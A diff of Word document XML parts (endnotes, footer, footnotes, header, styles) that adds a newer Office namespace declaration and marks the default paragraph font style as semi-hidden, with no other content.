+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -7343,7 +5244,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
       <w:pBdr>
@@ -7374,7 +5275,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -7399,7 +5300,7 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
       <w:keepNext/>
@@ -7533,7 +5434,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -8134,6 +6035,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Fontepargpadro">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabelanormal">
